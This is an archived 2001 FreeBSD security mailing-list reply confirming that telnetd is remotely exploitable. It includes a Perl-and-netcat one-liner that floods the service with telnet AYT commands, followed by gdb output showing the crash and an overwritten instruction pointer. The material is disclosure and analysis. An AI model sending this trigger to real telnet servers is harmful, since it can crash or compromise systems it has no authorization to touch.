Date: Thu, 19 Jul 2001 11:03:53 +0200 From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl> To: "Mike Tancsa" <mike@sentex.net> Cc: <security@freebsd.org> Subject: Re: FreeBSD remote root exploit ? Message-ID: <014d01c11031$bdab5a10$2001a8c0@clitoris> References: <5.1.0.14.0.20010719001357.03e22638@192.168.0.12>
next in thread | previous in thread | raw e-mail | index | archive | help
> Posted to bugtraq is a notice about telnetd being remotely root
> exploitable. Does anyone know if it is true ?
Yes, telnetd is vulnerable.
lagoon:venglin:~> perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c
x0 . "\r\n"' | nc localhost 23
(gdb) att 9024
Attaching to process 9024
0x28230f90 in ?? ()
(gdb) cont
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x5d736559 in ?? ()
(gdb) bt
#0 0x5d736559 in ?? ()
#1 0x804e9d9 in ?? ()
#2 0x804d1a1 in ?? ()
#3 0x804d6d1 in ?? ()
#4 0x804d14d in ?? ()
#5 0x8049bd3 in ?? ()
The strange %eip value is:
riget:root:/# perl -e 'printf("%c%c%c%c\n", 0x59, 0x65, 0x73, 0x5d)'
Yes]
"\r\n[Yes]\r\n" is response for IAC AYT command string.
--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?014d01c11031$bdab5a10$2001a8c0>